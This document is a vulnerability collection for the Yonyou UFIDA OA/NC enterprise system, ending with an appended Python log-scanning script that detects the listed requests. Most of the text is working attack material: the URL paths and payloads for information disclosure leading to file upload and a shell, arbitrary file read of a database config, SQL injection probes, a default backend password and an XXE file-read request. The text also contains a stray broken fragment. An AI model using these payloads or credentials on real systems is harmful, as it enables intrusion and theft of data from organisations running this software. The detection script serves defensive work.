Yonyou UFIDA OA System Vulnerability Collection

Information disclosure + weak password + arbitrary file upload to get a shell

1. Information disclosure

/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=

NU1

2. Weak password and arbitrary file upload

After logging in, visit the information-disclosure address again and you will have permission to upload files. Then go back to the home page and view the published content directly.

II. Arbitrary file read

/NCFindWeb?service=IPreAlertConfigService&filename=
/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml  # database configuration file

III. SQLi

/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false&param_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute

'or 1=1-- and 'or 1=2-- return different results

IV. Web Service

1. Web Service default backend auto-login + XXE

Backend: /uapws/
Auto-login, default password: 111111 (6)

2. XXE

**Note**: this endpoint can still be reached when the Web Service backend is disabled; the response is blank, but that does not affect the XXE arbitrary file read.
    /uapws/soapFormat.ajax

    POST request:
    msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///c:/windows/"> ]>
    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
    <soap:Fault>
    <faultcode>soap:Server%26xxe1two%3b</faultcode>
    </soap:Fault>
    </soap:Body>
    </soap:Envelope>%0a

3. Web Service SQLi

/uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService?wsdl  
/uapws/service/nc.itf.bd.crm.ICustomerExportToCrmService?wsdl

POST request:
POST /uapws/service/nc.itf.bd.crm.ICurrtypeExportToCrmService HTTP/1.1
Host: **xxx.xxx.com**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Forwarded-For: 8.8.8.8
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 646

<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="http://crm.bd.itf.nc/ICurrtypeExportToCrmService" xmlns:urn2="http://pub.vo.nc/BusinessException" xmlns:urn3="http://ws.uap.nc/lang">
  <SOAP-ENV:Header/>
  <SOAP-ENV:Body>
    <urn:exportCurrtypeToCrm>
      <string>1</string>
    </urn:exportCurrtypeToCrm>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
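As an added detection example (not part of the original write-up and not Yonyou code), the following Python script scans web-server access-log lines for requests to the endpoints listed on this page: the NCFindWeb file read, the iufo ActionServlet SQL probe and release action, and POSTs to soapFormat.ajax. The log lines and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic), modelled on the
# request paths listed in this write-up; the last line is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0800] "GET /NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml HTTP/1.1" 200 1532
10.0.0.6 - - [01/Jan/2024:10:00:01 +0800] "GET /service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&param_orgpk=level_code%27or%201%3D1--&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute HTTP/1.1" 200 8810
10.0.0.7 - - [01/Jan/2024:10:00:02 +0800] "POST /uapws/soapFormat.ajax HTTP/1.1" 200 0
10.0.0.8 - - [01/Jan/2024:10:00:03 +0800] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= HTTP/1.1" 200 4410
10.0.0.9 - - [01/Jan/2024:10:00:04 +0800] "GET /portal/index.jsp HTTP/1.1" 200 120
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A quote followed by an OR tautology, as in the 'or 1=1-- / 'or 1=2-- probe above.
SQLI_RE = re.compile(r"'\s*or\s+\d+\s*=\s*\d+", re.IGNORECASE)

def classify(method, target):
    """Return the list of rule names a single request line matches (empty if benign)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %27 etc.
    hits = []
    # NCFindWeb: filename parameter climbing out of the web root or naming prop.xml
    if parts.path == "/NCFindWeb":
        for fn in params.get("filename", []):
            if ".." in fn or fn.endswith("prop.xml"):
                hits.append("ncfindweb_file_read")
    # iufo ActionServlet: SQL tautology in any parameter, or the BBS release action
    if parts.path.endswith("ActionServlet"):
        values = [v for vals in params.values() for v in vals]
        if any(SQLI_RE.search(v) for v in values):
            hits.append("iufo_actionservlet_sqli_probe")
        if "createBBSRelease" in params.get("method", []):
            hits.append("iufo_inforelease_access")
    # soapFormat.ajax parses XML from the msg field; flag POSTs so the body gets inspected
    if parts.path == "/uapws/soapFormat.ajax" and method == "POST":
        hits.append("uapws_soapformat_post")
    return hits

def scan_log(text):
    """Return (client_ip, path, rules) for every request line that matches a rule."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["method"], m["target"])
        if hits:
            alerts.append((m["ip"], urlsplit(m["target"]).path, hits))
    return alerts
```

Running `scan_log(SAMPLE_LOG)` yields four alerts, one per listed endpoint, and nothing for the benign portal request; the soapFormat.ajax rule only flags the request, since the XXE payload itself sits in the POST body that an access log does not record.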